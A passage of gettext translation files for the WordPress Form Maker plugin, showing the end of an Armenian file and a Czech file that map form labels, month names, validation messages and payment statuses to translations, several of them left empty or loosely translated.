#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "արժեքը պետք է լինի "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Քանակը"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Ձեր հաշիվը պետք է լինի ոչ պակաս, քան "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Վերնագիր"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Առաջին"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Անցյալ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Միջին"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Տարածքի կոդ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Հեռախոսահամար"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Դոլար"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Ցենտ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "- ից "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Մինչեւ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "գնալ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Վերականգնել"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Ընտրել դաշտ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Ընտրել ամսաթիվ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-cs_CZ.po000060400000056711152434416630012211 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:51+0400\n"
"PO-Revision-Date: 2015-05-22 16:51+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: cs\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Ulice"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Ulice řádek 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Město"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stát / provincie / Region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Poštovní / PSČ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Země"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Leden"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Únor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Březen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Duben"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Květen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Červen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Červenec"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Srpen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Září"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Říjen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Listopad"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Prosinec"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Chyba, nesprávný bezpečnostní kód."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Vaše IP je na černé listině. Prosím, obraťte se na správce webu. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Souboru přesáhne povolenou velikost"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Je nám líto, ale nemáte možnost nahrát tento typ souboru."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Chyba může soubor nelze přesunout."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Toto pole %s vyžaduje jedinečný přístup a tato hodnota byla již podána."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Chyba, byl e-mail neposlal."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nic byl předložen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Váš formulář byl úspěšně odeslán."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Chyba, byl e-mail neposlal."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Vaše e-mailová adresa je již ověřena."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Váš e-mail byl úspěšně ověřen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Váš e-mail ověření vypršel."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Ověřovací odkaz je neplatný."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "pole je povinné."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Toto není platná e-mailová adresa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Nemůžete vybrat bývalé termín. Vyberte datum počínaje aktuální."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "hodnota musí být mezi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "množství "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Vaše skóre by měla být menší než "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Název"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Za prvé"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Poslední"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "na střed"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Kód oblasti"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefonní číslo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "dolarů "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "centů "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "od "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "na"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "jít "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Obnovit "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
